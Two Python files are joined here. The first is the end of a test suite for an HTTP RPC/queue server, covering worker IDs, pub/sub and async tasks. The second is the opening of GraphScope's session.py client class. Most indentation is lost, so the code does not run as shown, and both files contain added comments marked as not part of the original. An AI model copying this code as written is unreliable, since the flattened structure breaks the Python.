go(0.1, 'windows')
go(0.2, 'freebsd', 2000000)
go(0.3, 'macos')
go(0.4, 'unix', 1000000)
go(0.5, 'redhat')
go(0.6, 'ubuntu')
time.sleep(1)
d = get('/rpc/details').json()['test8']
workers = list(map(str, d['worker_ids']))
assert get('/test8', headers={'Worker-ID': workers[3]}).json()['name'] == 'macos'
assert get('/test8', headers={'Worker-ID': workers[1]}).json()['name'] == 'windows'
assert get('/test8', headers={'Worker-ID': workers[5]}).json()['name'] == 'redhat'
del workers[5]
del workers[3]
del workers[1]
d = get('/rpc/details').json()['test8']
assert workers == list(map(str, d['worker_ids']))
assert get('/test8', headers={'Worker-ID': '1000000'}).json()['name'] == 'unix'
assert get('/test8', headers={'Worker-ID': '2000000'}).json()['name'] == 'freebsd'
assert len(get('/rpc/details').json()['test8']['worker_ids']) == 2
assert get('/test8').json()['name'] == 'linux'
assert get('/test8').json()['name'] == 'ubuntu'
assert len(get('/rpc/details').json()['test8']['worker_ids']) == 0
time.sleep(0.1)
@mem('/test8')
def test8_worker_id2():
c0 = None
w0 = None
@run(0)
def worker():
nonlocal w0
w0 = get('/test8', type='get')
post('/' + w0.headers['id'], type='result', json={'result': 'w0'})
@run(0.1)
def client():
nonlocal c0
c0 = get('/test8', headers={'Worker-ID': 'worker-id:5'}, json={'data': 'c0'})
time.sleep(0.5)
assert c0 is None and w0 is None
details = get('/rpc/details').json()['test8']
assert details['workers'] == 1
assert details['clients'] == 1
c1 = get('/test8', json={'data': 'c1'})
assert c1.json()['result'] == 'w0'
assert w0.json()['data'] == 'c1'
assert c0 is None
details = get('/rpc/details').json()['test8']
assert details['workers'] == 0
assert details['clients'] == 1
w1 = get('/test8', type='get', headers={'Set-ID': 'worker-id:5'})
assert w1.json()['data'] == 'c0'
post('/' + w1.headers['id'], type='result', json={'result': 'w1'})
time.sleep(0.1)
assert c0.json()['result'] == 'w1'
@mem('/test9/pub')
def test9_pubsub():
error = 0
stopped = 0
r_sum = [0] * 6
def go(type, index):
@run(0)
def worker_get():
nonlocal error, stopped
if type == 'get':
get = requests.get
else:
s = requests.Session()
get = s.get
while True:
r = get(L + '/test9/pub', headers={'Type': type})
if not r.headers['Async']:
error += 1
msg = r.json()
if msg['data'] == 'stop':
break
r_sum[index] += msg['data']
time.sleep(0.1)
stopped += 1
go('get', 0)
go('get', 1)
go('get+', 2)
go('get+', 3)
go('worker', 4)
go('worker', 5)
s = requests.Session()
def client(data):
r = s.post(L + '/test9/pub', headers={'Type': 'pub'}, json=data)
assert r.status_code == 200
time.sleep(0.2)
client({'data': 1})
time.sleep(0.2)
assert r_sum == [1, 1, 1, 1, 1, 1]
client({'data': 2})
time.sleep(0.2)
assert r_sum == [3, 3, 3, 3, 3, 3]
client({'data': 3})
client({'data': 4})
client({'data': 5})
client({'data': 6})
client({'data': 7})
time.sleep(0.7)
assert r_sum == [6, 6, 28, 28, 28, 28]
client({'data': 'stop'})
time.sleep(0.2)
assert stopped == 6
@mem('/test10/*')
def test10():
names = []
@run(0)
def worker():
s = requests.Session()
while True:
r = s.post(L + '/test10/*', headers={'Type': 'get+'})
name = r.headers['name']
if name == 'test10/exit':
s.post(L, data='exit', headers={'Type': 'result'})
break
value = r.json()['value'] if r.content else None
names.append((name, value))
if r.headers.get('async') != 'true':
r2 = s.post(L, data='ok', headers={'Type': 'result'})
assert r2.status_code == 200
if value == 3:
time.sleep(0.5)
elif value in (7, 8, 9):
time.sleep(0.2)
time.sleep(0.1)
assert post('/test10/one', json={'value': 1}).text == 'ok'
assert names[0] == ('test10/one', 1)
time.sleep(0.1)
assert post('/test10/two/system', json={'value': 2}).text == 'ok'
assert names[1] == ('test10/two/system', 2)
time.sleep(0.1)
assert post('/test10/delay', json={'value': 3}).text == 'ok'
assert names[2] == ('test10/delay', 3)
assert post('/test10/check4', json={'value': 4}).text == 'ok'
assert names[3] == ('test10/check4', 4)
time.sleep(0.1)
assert post('/test10/async5', json={'value': 5}, type='async').status_code == 200
time.sleep(0.1)
assert names[4] == ('test10/async5', 5)
time.sleep(0.1)
assert post('/test10/async6', json={'value': 6}, type='async').status_code == 200
time.sleep(0.1)
assert names[5] == ('test10/async6', 6)
assert post('/test10/async7', json={'value': 7}, type='async').status_code == 200
assert post('/test10/async8', json={'value': 8}, type='async').status_code == 200
assert post('/test10/async9', json={'value': 9}, type='async').status_code == 200
assert post('/test10/async10', json={'value': 10}, type='async').status_code == 200
assert post('/test10/exit').text == 'exit'
assert names[6] == ('test10/async7', 7)
assert names[7] == ('test10/async8', 8)
assert names[8] == ('test10/async9', 9)
assert names[9] == ('test10/async10', 10)
@mem('/test11')
def test11():
count = 0
def go(k, v):
@run(0)
def w():
nonlocal count
post('/test11', headers={'Type': 'get', k: v})
count += 1
go('set-id', '500')
go('SET-ID', '1000')
go('Set-ID', 'x1500x')
go('sET-iD', 'aBc2000')
go('sEt-id', '2500')
time.sleep(0.1)
details = get('/rpc/details').json()
assert set(details['test11']['worker_ids']) == {'500','1000','x1500x','aBc2000','2500'}
get('/test11', type='delete')
time.sleep(0.1)
assert count == 5
@mem('/test12')
def test12_if_present():
result = []
def push(x):
result.append(x)
@run(0)
def worker():
s = requests.Session()
r = s.get(L + '/test12', headers={'Type': 'worker'})
while True:
if r.text == 'stop':
s.post(L, data='ok', headers={'Option': 'stop'})
break
time.sleep(0.2)
push('w' + r.text)
time.sleep(0.2)
r = s.post(L, data=b'ok')
push('stop')
@run(0.1)
def command1():
push(1)
r = post('/test12', data='1', headers={'Option': 'if present'})
push((1, r.status_code, r.text))
@run(0.2)
    def command2():
push(2)
r = post('/test12', data='2', headers={'Option': 'if present'})
push((2, r.status_code, r.text))
@run(0.3)
    def command3():
push(3)
r = post('/test12', data='3', headers={'Option': 'if present'})
push((3, r.status_code, r.text))
time.sleep(0.4)
push(4)
r = post('/test12', data='4', headers={'Option': 'if present'})
push((4, r.status_code, r.text))
assert tuple(result) == (1, 2, 3, 'w1', 4, (1, 200, 'ok'), 'w2', (2, 200, 'ok'), 'w3', (3, 200, 'ok'), 'w4', (4, 200, 'ok'))
result = []
assert post('/test12', data='stop').text == 'ok'
assert result == ['stop']
assert get('/test12', headers={'Option': 'if present'}).status_code == 204
assert get('/test12', headers={'Option': 'if present'}).status_code == 204
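# Hedged note (not part of the original file): these tests assume an RPC/queue
# server is already listening on http://localhost:8001. They are plain
# functions with bare asserts, so they can be collected by pytest or simply
# invoked in order, e.g.:
#
#     if __name__ == '__main__':
#         test_default()
#         test_request_without_id()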
|
session.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import copy
import json
import logging
import os
import pickle
import random
import sys
import threading
import time
import warnings
from queue import Empty as EmptyQueue
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
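# Hedged note (not part of the original file): DEFAULT_CONFIG_FILE points at an
# optional JSON file whose keys mirror the Session() keyword parameters, e.g.
#
#     {"num_workers": 4, "k8s_engine_cpu": 1.0, "k8s_engine_mem": "8Gi"}
#
# When present (and no explicit `config` is given) it is loaded silently by
# Session._load_config() and overrides the keyword parameters.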
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
"""Handler for structured fetches.
This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
which can be used for a low level `run` call of grpc_client.
Given the results of the low level run call, this class can also rebuild a result structure
matching the user-provided structure for fetches, but containing the corresponding results.
"""
def __init__(self, dag, fetches):
self._fetches = fetches
self._ops = list()
self._unpack = False
if not isinstance(self._fetches, (list, tuple)):
self._fetches = [self._fetches]
self._unpack = True
for fetch in self._fetches:
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation` in sess run method.")
self._ops.append(fetch)
# extract sub dag
self._sub_dag = dag.extract_subdag_for(self._ops)
if "debug" in os.environ:
logger.info("sub_dag: %s", self._sub_dag)
@property
def targets(self):
return self._sub_dag
def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
if isinstance(self._fetches[seq], Operation):
# for nx Graph
return op_result.graph_def
# get graph dag node as base
graph_dag_node = self._fetches[seq]
# construct graph
g = Graph(graph_dag_node)
        # update graph fields from graph_def
g.update_from_graph_def(op_result.graph_def)
return g
def _rebuild_learning_graph(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.learning.graph import Graph as LearningGraph
handle = op_result.handle
handle = json.loads(base64.b64decode(handle).decode("utf-8"))
config = op_result.config.decode("utf-8")
handle["server"] = op_result.result.decode("utf-8")
handle["client_count"] = 1
graph_dag_node = self._fetches[seq]
# construct learning graph
g = LearningGraph(
graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
)
return g
def _rebuild_interactive_query(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
# get interactive query dag node as base
interactive_query_node = self._fetches[seq]
# construct interactive query
interactive_query = InteractiveQuery(
interactive_query_node,
op_result.result.decode("utf-8"),
op_result.extra_info.decode("utf-8"),
)
interactive_query.status = InteractiveQueryStatus.Running
return interactive_query
def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.app import App
# get app dag node as base
app_dag_node = self._fetches[seq]
# construct app
app = App(app_dag_node, op_result.result.decode("utf-8"))
return app
def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.context import Context
from graphscope.framework.context import DynamicVertexDataContext
# get context dag node as base
context_dag_node = self._fetches[seq]
ret = json.loads(op_result.result.decode("utf-8"))
context_type = ret["context_type"]
if context_type == "dynamic_vertex_data":
# for nx
return DynamicVertexDataContext(context_dag_node, ret["context_key"])
else:
return Context(context_dag_node, ret["context_key"])
def _rebuild_gremlin_results(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.interactive.query import ResultSet
# get result set node as base
result_set_dag_node = self._fetches[seq]
return ResultSet(result_set_dag_node)
def wrapper_results(self, response: message_pb2.RunStepResponse):
rets = list()
for seq, op in enumerate(self._ops):
for op_result in response.results:
if op.key == op_result.key:
if op.output_types == types_pb2.RESULTS:
if op.type == types_pb2.RUN_APP:
rets.append(self._rebuild_context(seq, op, op_result))
elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
rets.append(pickle.loads(op_result.result))
else:
# for nx Graph
rets.append(op_result.result.decode("utf-8"))
if op.output_types == types_pb2.GREMLIN_RESULTS:
rets.append(self._rebuild_gremlin_results(seq, op, op_result))
if op.output_types == types_pb2.GRAPH:
rets.append(self._rebuild_graph(seq, op, op_result))
if op.output_types == types_pb2.LEARNING_GRAPH:
rets.append(self._rebuild_learning_graph(seq, op, op_result))
if op.output_types == types_pb2.APP:
rets.append(None)
if op.output_types == types_pb2.BOUND_APP:
rets.append(self._rebuild_app(seq, op, op_result))
if op.output_types in (
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
rets.append(
json.loads(op_result.result.decode("utf-8"))["object_id"]
)
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
if (
op.type == types_pb2.CONTEXT_TO_DATAFRAME
or op.type == types_pb2.GRAPH_TO_DATAFRAME
):
rets.append(decode_dataframe(op_result.result))
if (
op.type == types_pb2.CONTEXT_TO_NUMPY
or op.type == types_pb2.GRAPH_TO_NUMPY
):
rets.append(decode_numpy(op_result.result))
if op.output_types == types_pb2.INTERACTIVE_QUERY:
rets.append(self._rebuild_interactive_query(seq, op, op_result))
if op.output_types == types_pb2.NULL_OUTPUT:
rets.append(None)
break
return rets[0] if self._unpack else rets
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
    A Session can register itself as the default session with :meth:`as_default`, and all operations
    after that will use the default session. A session deregisters itself as the default session
    when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(g, 4)
>>> sess.close()
>>> # or use a session as default
>>> sess = gs.session().as_default()
>>> g = gs.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> sess.close()
    We support setting up a service cluster and creating an RPC session in the following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
    Also, :class:`Session` provides several keyword params for users to define the cluster.
    You may use the param :code:`k8s_gs_image` to specify the image for all engine pods, and
    the params :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources.
    You can find details on all params in the :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
self,
config=None,
addr=gs_config.addr,
mode=gs_config.mode,
cluster_type=gs_config.cluster_type,
num_workers=gs_config.num_workers,
preemptive=gs_config.preemptive,
k8s_namespace=gs_config.k8s_namespace,
k8s_service_type=gs_config.k8s_service_type,
k8s_gs_image=gs_config.k8s_gs_image,
k8s_etcd_image=gs_config.k8s_etcd_image,
k8s_gie_graph_manager_image=gs_config.k8s_gie_graph_manager_image,
k8s_zookeeper_image=gs_config.k8s_zookeeper_image,
k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
k8s_etcd_mem=gs_config.k8s_etcd_mem,
k8s_zookeeper_cpu=gs_config.k8s_zookeeper_cpu,
k8s_zookeeper_mem=gs_config.k8s_zookeeper_mem,
k8s_gie_graph_manager_cpu=gs_config.k8s_gie_graph_manager_cpu,
k8s_gie_graph_manager_mem=gs_config.k8s_gie_graph_manager_mem,
k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
vineyard_shared_mem=gs_config.vineyard_shared_mem,
k8s_engine_cpu=gs_config.k8s_engine_cpu,
k8s_engine_mem=gs_config.k8s_engine_mem,
k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
k8s_mars_worker_mem=gs_config.mars_worker_mem,
k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
k8s_volumes=gs_config.k8s_volumes,
k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
timeout_seconds=gs_config.timeout_seconds,
dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
with_mars=gs_config.with_mars,
enable_gaia=gs_config.enable_gaia,
**kw
):
"""Construct a new GraphScope session.
Args:
            config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
                For a str, it will be treated as a path and the configuration file will be read to build a
                session if the file exists. If not specified, the global default configuration
                :code:`DEFAULT_CONFIG_FILE` will be used, which gets its value from GS_CONFIG_PATH
                in the environment. Note that it will overwrite explicit parameters. Defaults to None.
addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
A new session id will be generated for each session connection.
mode (str, optional): optional values are eager and lazy. Defaults to eager.
Eager execution is a flexible platform for research and experimentation, it provides:
An intuitive interface: Quickly test on small data.
Easier debugging: Call ops directly to inspect running models and test changes.
Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
            cluster_type (str, optional): Deploy GraphScope instance on hosts or a k8s cluster. Defaults to k8s.
                Available options: "k8s" and "hosts". Note that hosts mode currently only supports deployment on localhost.
num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
                as limits and provide the minimum available value as requests, but this will give the pod a `Burstable` QoS,
which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
same value.
            k8s_namespace (str, optional): The namespace in which to create all resources.
                If the param is missing, it will try to read the namespace from the kubernetes context, or
                a random namespace will be created (and later deleted) if the namespace does not exist.
                Defaults to None.
k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
k8s_gs_image (str, optional): The GraphScope engine's image.
            k8s_etcd_image (str, optional): The image of etcd, which is used by vineyard.
k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
k8s_gie_graph_manager_image (str, optional): The GraphScope interactive engine's graph manager image.
            k8s_zookeeper_image (str, optional): The image of zookeeper, which is used by the GIE graph manager.
            k8s_vineyard_daemonset (str, optional): The name of the vineyard Helm deployment to use. GraphScope will try to
                discover the daemonset in the kubernetes cluster and use it if it exists, falling back to launching
                a bundled vineyard container otherwise.
k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
k8s_zookeeper_cpu (float, optional):
Minimum number of CPU cores request for zookeeper container. Defaults to 0.5.
k8s_zookeeper_mem (str, optional):
Minimum number of memory request for zookeeper container. Defaults to '256Mi'.
k8s_gie_graph_manager_cpu (float, optional):
Minimum number of CPU cores request for graphmanager container. Defaults to 1.0.
k8s_gie_graph_manager_mem (str, optional):
Minimum number of memory request for graphmanager container. Defaults to '4Gi'.
k8s_mars_worker_cpu (float, optional):
Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
k8s_mars_worker_mem (str, optional):
Minimum number of memory request for mars worker container. Defaults to '4Gi'.
k8s_mars_scheduler_cpu (float, optional):
Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
k8s_mars_scheduler_mem (str, optional):
Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
with_mars (bool, optional):
Launch graphscope with mars. Defaults to False.
enable_gaia (bool, optional):
Launch graphscope with gaia enabled. Defaults to False.
k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
containers in a pod. Defaults to {}.
For example, you can mount host path with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {
"path": "<path>",
"type": "Directory"
},
"mounts": [
{
"mountPath": "<path1>"
},
{
"mountPath": "<path2>"
}
]
}
}
Or you can mount PVC with:
k8s_volumes = {
"my-data": {
"type": "persistentVolumeClaim",
"field": {
"claimName": "your-pvc-name"
},
"mounts": [
{
"mountPath": "<path1>"
}
]
}
}
Also, you can mount a single volume with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {xxx},
"mounts": {
"mountPath": "<path1>"
}
}
}
            timeout_seconds (int, optional): Seconds to wait for the service to become ready (or to wait for deletion if
                k8s_waiting_for_delete is True).
            dangling_timeout_seconds (int, optional): After this many seconds of client disconnection,
                the coordinator will kill this graphscope instance. Defaults to 600.
Expect this value to be greater than 5 (heartbeat interval).
Disable dangling check by setting -1.
k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
**kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
- k8s_minikube_vm_driver: Deprecated.
- k8s_client_config (dict, optional):
Provide configurable parameters for connecting to remote k8s,
which strongly relies on the `kube_config.new_client_from_config` function.
eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
config_file: Name of the kube-config file.
context: set the active context. If is set to None, current_context from config file will be used.
persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
- log_level: Deprecated.
Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
- show_log: Deprecated.
                    Move this param as a global configuration. Set via `graphscope.set_option(show_log=True)`
- k8s_vineyard_shared_mem: Deprecated.
Please use vineyard_shared_mem instead.
Raises:
TypeError: If the given argument combination is invalid and cannot be used to create
a GraphScope session.
"""
self._config_params = {}
self._accessable_params = (
"addr",
"mode",
"cluster_type",
"num_workers",
"preemptive",
"k8s_namespace",
"k8s_service_type",
"k8s_gs_image",
"k8s_etcd_image",
"k8s_image_pull_policy",
"k8s_image_pull_secrets",
"k8s_gie_graph_manager_image",
"k8s_zookeeper_image",
"k8s_coordinator_cpu",
"k8s_coordinator_mem",
"k8s_etcd_num_pods",
"k8s_etcd_cpu",
"k8s_etcd_mem",
"k8s_zookeeper_cpu",
"k8s_zookeeper_mem",
"k8s_gie_graph_manager_cpu",
"k8s_gie_graph_manager_mem",
"k8s_vineyard_daemonset",
"k8s_vineyard_cpu",
"k8s_vineyard_mem",
"vineyard_shared_mem",
"k8s_engine_cpu",
"k8s_engine_mem",
"k8s_mars_worker_cpu",
"k8s_mars_worker_mem",
"k8s_mars_scheduler_cpu",
"k8s_mars_scheduler_mem",
"with_mars",
"enable_gaia",
"k8s_volumes",
"k8s_waiting_for_delete",
"timeout_seconds",
"dangling_timeout_seconds",
)
saved_locals = locals()
for param in self._accessable_params:
self._config_params[param] = saved_locals[param]
# parse config, which should be a path to config file, or dict
# config has highest priority
if isinstance(config, dict):
self._config_params.update(config)
elif isinstance(config, str):
            self._load_config(config, silent=False)
elif DEFAULT_CONFIG_FILE:
self._load_config(DEFAULT_CONFIG_FILE)
# update other optional params
self._config_params.update(kw)
# initial setting of cluster_type
self._cluster_type = self._parse_cluster_type()
# initial dag
self._dag = Dag()
# mars cannot work with run-on-local mode
if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
raise NotImplementedError(
"Mars cluster cannot be launched along with local GraphScope deployment"
)
# deprecated params handle
if "show_log" in kw:
warnings.warn(
"The `show_log` parameter has been deprecated and has no effect, "
"please use `graphscope.set_option(show_log=%s)` instead."
% kw.pop("show_log", None),
category=DeprecationWarning,
)
if "log_level" in kw:
warnings.warn(
"The `log_level` parameter has been deprecated and has no effect, "
"please use `graphscope.set_option(log_level=%r)` instead."
% kw.pop("show_log", None),
category=DeprecationWarning,
)
if "k8s_vineyard_shared_mem" in kw:
warnings.warn(
"The `k8s_vineyard_shared_mem` has been deprecated and has no effect, "
"please use `vineyard_shared_mem` instead."
% kw.pop("k8s_vineyard_shared_mem", None),
category=DeprecationWarning,
)
# update k8s_client_config params
self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
# There should be no more custom keyword arguments.
if kw:
raise ValueError("Not recognized value: ", list(kw.keys()))
if self._config_params["addr"]:
logger.info(
"Connecting graphscope session with address: %s",
self._config_params["addr"],
)
else:
logger.info(
"Initializing graphscope session with parameters: %s",
self._config_params,
)
self._closed = False
# coordinator service endpoint
self._coordinator_endpoint = None
self._launcher = None
self._heartbeat_sending_thread = None
self._grpc_client = None
self._session_id = None # unique identifier across sessions
# engine config:
#
# {
# "experiment": "ON/OFF",
# "vineyard_socket": "...",
# "vineyard_rpc_endpoint": "..."
# }
self._engine_config = None
# interactive instance related graph map
self._interactive_instance_dict = {}
# learning engine related graph map
self._learning_instance_dict = {}
self._default_session = None
atexit.register(self.close)
# create and connect session
with CaptureKeyboardInterrupt(self.close):
self._connect()
self._disconnected = False
# heartbeat
self._heartbeat_interval_seconds = 5
self._heartbeat_sending_thread = threading.Thread(
target=self._send_heartbeat, args=()
)
self._heartbeat_sending_thread.daemon = True
self._heartbeat_sending_thread.start()
# networkx module
self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
@property
def session_id(self):
return self._session_id
@property
def dag(self):
return self._dag
    def _load_config(self, path, silent=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
            if not silent:
raise exp
def _parse_cluster_type(self):
if self._config_params["addr"] is not None:
# get the cluster type after connecting
return types_pb2.UNDEFINED
else:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
return types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
return types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
@property
def engine_config(self):
"""Show the engine configration associated with session in json format."""
return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
@property
def closed(self):
return self._closed
def eager(self):
return self._config_params["mode"] == "eager"
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except GRPCError as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
def close(self):
"""Closes this session.
This method frees all resources associated with the session.
"""
if self._closed:
return
self._closed = True
self._coordinator_endpoint = None
self._deregister_default()
if self._heartbeat_sending_thread:
self._heartbeat_sending_thread.join(
timeout=self._heartbeat_interval_seconds
)
self._heartbeat_sending_thread = None
self._disconnected = True
# close all interactive instances
for instance in self._interactive_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._interactive_instance_dict.clear()
# close all learning instances
for instance in self._learning_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._learning_instance_dict.clear()
if self._grpc_client:
try:
self._grpc_client.close()
except Exception:
pass
self._grpc_client = None
_session_dict.pop(self._session_id, None)
# clean up
if self._config_params["addr"] is None:
try:
if self._launcher:
self._launcher.stop()
except Exception:
pass
self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError("Operation on closed session." if msg is None else msg)
# Context manager
def __enter__(self):
"""Context management protocol.
Returns self and register self as default session.
"""
self._check_closed()
self.as_default()
return self
def __exit__(self, type, value, traceback):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
            ValueError: If a default session already exists in the current context.
Returns:
A context manager using this session as the default session.
